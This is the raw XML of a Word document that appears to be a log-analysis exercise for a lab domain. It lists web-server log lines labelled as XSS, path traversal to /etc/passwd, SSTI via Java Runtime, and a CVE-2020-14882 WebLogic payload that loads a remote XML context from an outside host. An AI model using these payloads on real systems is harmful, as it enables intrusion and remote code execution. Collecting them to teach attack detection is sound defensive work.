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0772" w14:textId="77777777" w:rsidR="003B0FEE" w:rsidRDefault="00200B11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Mozilla/5.0+(Linux;+Android+7.1.2;+Redmi+4X+Build/N2G47H;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/110.0.5481.63+Mobile+Safari/537.36  %3Cscript%3Ealert%28%22testbottles%22%29%3C%2Fscript%3E  kaspi.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2023-02-15T08:32:00  dev.kaspi.lab 443 78.109.151.117 10.2.50.21  80  POST /maps/api/logo/  -  200  2265  2780  0  2479  16947  HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B6A45" w14:textId="77777777" w:rsidR="003B0FEE" w:rsidRDefault="003B0FEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F55A626" w14:textId="77777777" w:rsidR="00755539" w:rsidRDefault="00200B11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Атака обхода пути</w:t>
      </w:r>
      <w:r w:rsidR="003B0FEE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ip </w:t>
      </w:r>
      <w:r w:rsidR="00755539">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>79.133.190.153</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Mozilla/5.0+(Linux;+Android+12;+SM-A315F+Build/SP1A.210812.016;+wv)  view%3D..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd  kaspi.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2023-02-15T08:32:00  forum.kaspi.lab 443  79.133.190.153 10.2.1.12  80  POST  /bottles/dashboardapi2/api/v1/Dashboard/getSampleRequest  -  200  2265  2780  0  2479  16947  HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D776E" w14:textId="77777777" w:rsidR="00755539" w:rsidRDefault="00755539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7482A237" w14:textId="126C0C6B" w:rsidR="00755539" w:rsidRDefault="00AC5CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSTI attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>185.57.72.200 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D042AC7" w14:textId="77777777" w:rsidR="001C0CE6" w:rsidRDefault="00200B11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Mozilla/5.0+(Linux;+Android+9;+TECNO+CC7+Build/PPR1.180610.011;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/101.0.4951.41+Mobile+Safari/537.366  actionoutcome%3D%2Fpwn.xhtml%3Fpwned%3D%23%7Bexpressions.getclass%28%29.forname%28%27java.lang.runtime%27%29.getdeclaredmethods%28%29%5B0%5D%7D  kaspi.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2023-02-15T08:32:00  aws.kaspi.lab 443 185.57.72.200  10.2.1.12  80  GET  /bottles/dashboardapi2/api/v1/Dashboard/getSampleRequest  -  200  2265  2780  0  2479  16947  HTTP/1.1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DF47BF4" w14:textId="77777777" w:rsidR="001C0CE6" w:rsidRDefault="001C0CE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139A7F31" w14:textId="77777777" w:rsidR="00952038" w:rsidRDefault="00952038" w:rsidP="00E17C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Oracle Weblogic Server Vulnerability : CVE-2020–14882</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB4A8A3" w14:textId="12A08247" w:rsidR="00200B11" w:rsidRDefault="00952038">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>149.27.81.115</w:t>
      </w:r>
      <w:r w:rsidR="00200B11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00200B11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13,4+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E148  _nfpb%3Dtrue%26_pagelabel%3Dhomepage1%26handle%3Dcom.bea.core.repackaged.springframework.context.support.classpathxmlapplicationcontext%28%22http%3A%2F%2F8.8.8.8%3A37225%22%29  kaspi.lab</w:t>
      </w:r>
      <w:r w:rsidR="00200B11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2023-02-15T08:32:00  telecom.kaspi.lab 443 149.27.81.115  10.2.1.12  80  GET  /market/api/v2/order  -  200  2265  2780  0  2479  16947  HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00200B11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00200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11"/>
    <w:rsid w:val="001C0CE6"/>
    <w:rsid w:val="00200B11"/>
    <w:rsid w:val="003B0FEE"/>
    <w:rsid w:val="00755539"/>
    <w:rsid w:val="00952038"/>
    <w:rsid w:val="00AC5CE7"/>
    <w:rsid w:val="00E8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D6BF7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{524982A0-97BF-6340-A2B8-E51739FD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nurkhatmaratov@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nurkhatmaratov@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-22T05:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-22T05:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>